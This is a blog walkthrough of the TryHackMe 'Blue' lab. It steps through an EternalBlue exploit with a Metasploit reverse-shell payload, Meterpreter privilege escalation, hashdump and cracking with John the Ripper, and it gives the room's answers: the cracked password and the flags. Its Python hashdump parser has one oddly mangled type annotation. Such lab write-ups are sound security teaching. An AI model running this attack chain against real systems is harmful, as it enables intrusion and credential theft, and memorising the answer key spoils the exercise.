TryHackMe CTF: Blue — Walkthrough

November 29, 2024, by Jasper
Posted in CTF, TryHackMe

Hi! It is time to look at the Blue CTF on TryHackMe. I am making these walkthroughs to keep myself motivated to learn cyber security and to make sure I retain the knowledge gained from THM's rooms. Join me in learning cyber security. I will try to explain concepts as I go, to differentiate myself from other walkthroughs.

Blue CTF

Room URL: https://tryhackme.com/room/blue


Task 1 (Recon)

Let’s get started with some recon!

Questions

Scan the machine. (If you are unsure how to tackle this, I recommend checking out the Nmap room)

Let’s get started with some port scanning with nmap.

nmap -sV -sC --script vuln 10.10.184.191

The -sV flag adds version detection, the -sC flag runs Nmap's default scripts, and --script vuln runs the vulnerability-detection script category, which reports known CVEs it can match against the detected services.

Doing some port scanning

There is a lot to look at! We can see a variety of services running: RPC, NetBIOS, SMB and remote access. In addition we can see a vulnerability: smb-vuln-ms17-010, with CVE number CVE-2017-0143.

Answer: No answer needed

How many ports are open with a port number under 1000?

Answer: 3

What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)

Answer: ms17-010


Task 2 (Gain Access)

Exploit the machine and gain a foothold.

Questions

Start Metasploit

Answer: No answer needed

Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)

Well, we know the name of the vulnerability, and we want to search for modules of the type exploit. So we can enter the following command in msfconsole:

search ms17-010 type:exploit
Searching for ms17–010 exploit modules

Considering the name of this room, I will go with the EternalBlue one.

Answer: exploit/windows/smb/ms17_010_eternalblue

Show options and set the one required value. What is the name of this value? (All caps for submission)

This is very often RHOSTS, but let’s have a look. Load the module by entering use 0. Then enter show options.

Loading the ms17_010_eternalblue module and showing options

And yes, it is RHOSTS, which is the target host IP.

Answer: RHOSTS

Usually it would be fine to run this exploit as is; however, for the sake of learning, you should do one more thing before exploiting the target. Enter the following command and press enter:

set payload windows/x64/shell/reverse_tcp

Set the payload (see above), and set the RHOSTS option to the target machine IP.

With that done, run the exploit!

Simply type run or exploit.

Answer: No answer needed

Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.

We got access:

Gaining access

Background the shell by pressing Control+Z and move on to task 3.

Answer: No answer needed


Task 3 (Escalate)

Escalate privileges, learn how to upgrade shells in metasploit.

Questions

If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)

I did a simple search for shell and found the following module:

Searching for the shell_to_meterpreter module

Answer: post/multi/manage/shell_to_meterpreter

Select this (use MODULE_PATH). Show options, what option are we required to change?

Activate the module with use post/multi/manage/shell_to_meterpreter, then enter show options.

Showing the options for the shell_to_meterpreter module

The answer is SESSION.

Answer: SESSION

Set the required option, you may need to list all of the sessions to find your target here.

In the above screenshot I used sessions -l to find the id of the shell session. Proceed by setting SESSION to that id, in my case 1 (set SESSION 1).

Answer: No answer needed

Run! If this doesn’t work, try completing the exploit from the previous task once more.

Enter run.

Running the shell_to_meterpreter module

Enter the sessions -l command once more to see that we have an active Meterpreter session:

It is running on id 2.

Answer: No answer needed

Once the meterpreter shell conversion completes, select that session for use.

Change sessions by writing sessions -i 2.

Activating the meterpreter session

Answer: No answer needed

Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command ‘shell’ and run ‘whoami’. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again.

Let’s run a shell and run whoami. We are indeed system.

Running basic commands

Now background the shell, and select the meterpreter session once more.

Answer: No answer needed

List all of the processes running via the ‘ps’ command. Just because we are system doesn’t mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column).

Run the ps command.

Looking at the running processes with ps

Pick a system process. I will remember id 2728.

Answer: No answer needed

Migrate to this process using the ‘migrate PROCESS_ID’ command where the process id is the one you just wrote down in the previous step. This may take several attempts, migrating processes is not very stable. If this fails, you may need to re-run the conversion process or reboot the machine and start once again. If this happens, try a different process next time.

Simply enter migrate 2728 (or another id you picked).

Migrating to a system process

Migration completed!

Answer: No answer needed


Task 4 (Cracking)

Dump the non-default user’s password and crack it!

Questions

Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?

Now that we have our elevated shell, run hashdump.

Running hashdump

In case you are wondering, each line of the hashdump output is colon-separated and follows this format:

  1. Username (Administrator, Jon, etc.)
  2. Relative Identifier (RID), the last part of the account's SID
  3. LM hash
  4. NTLM (NT) hash

The non-default user is Jon.

Answer: Jon
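To make the format above concrete, here is a small parser for hashdump lines, added here as an example and not part of the room or the walkthrough's own tooling. It splits each line into the four fields, separates built-in accounts (RID below 1000) from locally created ones, and flags the well-known "empty" LM and NT hash values. The sample lines are constructed: only Jon's NT hash is the one quoted in this walkthrough; the RIDs and the other entries are assumed.

```python
import re
from dataclasses import dataclass

# Well-known hash values meaning "no LM hash stored" and "blank password".
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
# Built-in accounts (Administrator=500, Guest=501, ...) have RIDs below 1000.
FIRST_USER_RID = 1000

# user:RID:LM:NT:::  (32 hex chars per hash, trailing ::: are unused fields)
LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)


@dataclass
class Account:
    user: str
    rid: int
    lm: str
    nt: str

    @property
    def is_builtin(self) -> bool:
        return self.rid < FIRST_USER_RID

    @property
    def has_password(self) -> bool:
        return self.nt != EMPTY_NT

    @property
    def lm_hash_present(self) -> bool:
        # A real LM hash means the legacy LM scheme is still enabled: a weakness worth noting.
        return self.lm != EMPTY_LM


def parse_hashdump(text: str) -> list[Account]:
    """Parse hashdump output; raise on any line that does not match the format."""
    accounts = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised hashdump line: {line!r}")
        accounts.append(Account(m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower()))
    return accounts


def non_default_users(accounts: list[Account]) -> list[str]:
    """Locally created accounts, i.e. the 'non-default user' the task asks for."""
    return [a.user for a in accounts if not a.is_builtin]


def john_nt_input(accounts: list[Act if False else Account]) -> list[str]:
    """user:nthash lines for non-default accounts that actually have a password (john --format=nt)."""
    return [f"{a.user}:{a.nt}" for a in accounts if not a.is_builtin and a.has_password]


# Constructed sample (only Jon's NT hash is taken from the walkthrough).
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
"""
```

Feeding john_nt_input() to a file keeps the username next to the hash, so john's --show output names the account instead of leaving you to match hashes by hand.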

Copy this password hash to a file and research how to crack it. What is the cracked password?

Copy the hash (ffb43f0de35be4d9917ac0cc8ad57f8d) to a file by running:

echo 'ffb43f0de35be4d9917ac0cc8ad57f8d' > hash.txt

Let's use John the Ripper to crack it. I first thought the format would be LM, but it is actually NT, so we use --format=nt.

john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

This gives us the answer.

Cracking the password hash with john

Answer: alqfna22


Task 5 (Find flags!)

Find the three flags planted on this machine. These are not traditional flags, rather, they’re meant to represent key locations within the Windows system. Use the hints provided below to complete this room!

Completed Blue? Check out Ice: Link

You can check out the third box in this series, Blaster, here: Link

Questions

Flag1? This flag can be found at the system root.

Make sure you are still in the meterpreter session. Check your present working directory by entering pwd, then move up one level (cd ..) twice. List the files in the current directory (ls or dir) and finally read the flag by running cat flag1.txt.

Finding the first flag

Answer: flag{access_the_machine}

Flag2? This flag can be found at the location where passwords are stored within Windows.

Errata: Windows really doesn't like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This is relatively rare, however, it can happen.

Windows passwords are stored as hashes in the SAM database, which lives in the C:\Windows\System32\config directory. Change your directory to there in the meterpreter shell:

cd C:/Windows/System32/config

List the files there and read flag2.txt:

Finding the second flag

Answer: flag{sam_database_elevated_access}

flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.

I first thought I had to look into the C:/Users/Administrator folder but this does not exist. But Jon is an administrator so let’s look there.

Looking at the users directory

If we list all files in the Jon directory we do not see any flag. Let’s go into the Documents folder. And bingo!

Finding the third flag

Answer: flag{admin_documents_can_be_valuable}


We are done! This was fun, and if you followed along with the Metasploit rooms on TryHackMe (I have walkthroughs for those as well!) it shouldn't have been too difficult 🙂
